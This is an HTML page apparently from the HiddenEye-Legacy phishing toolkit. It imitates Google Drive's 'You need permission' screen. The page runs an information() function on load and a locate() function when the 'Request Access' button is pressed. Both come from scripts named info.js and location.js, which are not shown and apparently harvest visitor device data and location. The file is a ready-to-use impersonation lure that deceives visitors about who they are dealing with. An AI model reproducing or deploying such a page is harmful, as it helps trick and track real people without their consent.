mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
42 lines
1.6 KiB
HTML
42 lines
1.6 KiB
HTML
|
<!DOCTYPE html>
|
||
|
<html lang="en">
|
||
|
<head>
|
||
|
<meta name="description" content="Web word processing, presentations and spreadsheets">
|
||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0">
|
||
|
<link rel="shortcut icon" href="/images/drive_favicon1.ico">
|
||
|
<title>Google Drive - Access Denied</title>
|
||
|
<link rel="stylesheet" type="text/css" href="css/main.css">
|
||
|
<script type="text/javascript">
|
||
|
if (window.location.protocol == "http:") {
|
||
|
var restOfUrl = window.location.href.substr(5);
|
||
|
window.location = "https:" + restOfUrl;
|
||
|
}
|
||
|
</script>
|
||
|
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
|
||
|
<script type="text/javascript" src="js/info.js"></script>
|
||
|
<script type="text/javascript" src="js/location.js"></script>
|
||
|
</head>
|
||
|
<body onload="information();">
|
||
|
<div id="outerContainer">
|
||
|
<div id="innerContainer">
|
||
|
<div style="position: absolute; top: -80px;">
|
||
|
<div id="drive-logo">
|
||
|
<span class="docs-drivelogo-img"></span>
|
||
|
<span class="docs-drivelogo-text"> Drive</span>
|
||
|
</div>
|
||
|
</div>
|
||
|
<div style="clear:both"></div>
|
||
|
<div id="main">
|
||
|
<div id="accessDeniedIcon"></div>
|
||
|
<p id="accessDeniedHeader">You need permission</p>
|
||
|
<div id="message">
|
||
|
<p>Want it? Ask for access, or switch to an account with permission.</p>
|
||
|
</div>
|
||
|
<p id="buttons" style="padding-top: 10px">
|
||
|
<button id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate();">Request Access</button>
|
||
|
</p>
|
||
|
</div>
|
||
|
</div>
|
||
|
</div>
|
||
|
</body>
|
||
|
</html>
|